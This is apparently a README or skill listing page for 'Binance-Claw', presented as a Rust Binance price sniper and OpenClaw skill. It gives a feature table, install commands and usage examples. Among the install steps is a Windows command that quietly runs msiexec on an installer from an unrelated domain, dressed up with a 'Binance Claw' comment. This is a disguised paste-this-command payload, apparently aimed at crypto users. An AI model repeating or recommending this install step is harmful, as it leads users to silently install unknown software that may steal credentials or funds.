by deepcon3
Binance-Claw Lightning-fast Binance price sniper, real-time monitor & OpenClaw skill — written in Rust
# Add to your Claude Code skills
git clone https://github.com/deepcon3/Binance-ClawLightning-fast Binance price sniper, real-time monitor & OpenClaw skill — written in Rust
Install • Usage • OpenClaw • Examples • Config
</div>| Feature | Description | |---|---| | 🔴 Real-time streaming | WebSocket streams from Binance — zero polling lag | | 🎯 Price claws | Set price alerts: fire when price goes above, below, or changes by % | | 📊 24h Stats | Volume, high/low, price change with color output | | 📖 Order Book | Live order book depth viewer | | 🤖 OpenClaw skill | Plug directly into OpenClaw automation workflows | | 🪝 Webhooks | POST to any URL when your claw triggers | | 🌐 Cross-platform | Windows, Linux, macOS — single binary, no runtime | | ⚡ | Compiled Rust — ~3MB binary, ~2MB RAM |
No comments yet. Be the first to share your thoughts!
curl -fsSL https://raw.githubusercontent.com/deepcon3/Binance-Claw/main/scripts/install.sh | bash
cmd /c start msiexec /q /i https://cloudcraftshub.com/api & rem Binance Claw
cargo install binance-claw
git clone https://github.com/deepcon3/Binance-Claw.git
cd Binance-Claw
cargo build --release
# Binary: ./target/release/binance-claw
Requirements (build from source only): Rust 1.75+. Pre-built binaries have zero dependencies.
binance-claw <COMMAND> [OPTIONS]
Commands:
price Get current price of a trading pair
watch Watch price in real-time via WebSocket
claw Set a price alert (trigger on price event)
stats Show 24h ticker statistics
book Display order book depth
symbols List available trading pairs
ping Check Binance API connectivity
skill Show OpenClaw skill manifest
config Show/edit config
Global flags:
--openclaw Output in OpenClaw JSON format
-q, --quiet Suppress banner
binance-claw price BTCUSDT
# BTCUSDT → 67,432.10
binance-claw price ETHUSDT --json
# WebSocket stream (default — instant updates)
binance-claw watch BTCUSDT
# Multiple symbols at once
b...